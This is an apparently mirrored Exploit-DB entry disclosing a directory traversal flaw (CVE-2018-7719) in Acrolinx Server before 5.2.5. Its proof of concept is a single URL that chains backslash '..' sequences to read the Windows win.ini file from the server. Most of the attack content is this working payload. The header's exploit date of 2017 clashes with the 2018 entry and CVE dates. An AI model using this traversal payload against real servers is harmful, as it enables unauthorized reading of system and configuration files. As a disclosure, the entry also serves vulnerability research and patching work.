Acrolinx Server < 5.2.5 - Directory Traversal

  • 作者: Berk Dusunur
    日期: 2018-03-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44345/
  • # Exploit Title: Acrolinx Dashboard Directory Traversal
    # CVE: CVE 2018-7719
    # Date: 19.02.2017
    # Exploit Author: Berk Dusunur
    # Vendor Homepage: www.acrolinx.com
    # Version:Before 5.2.5
    
    PoC
    
    Acrolinx dashboard windows works on the server.
    
    
    http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
    
    http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html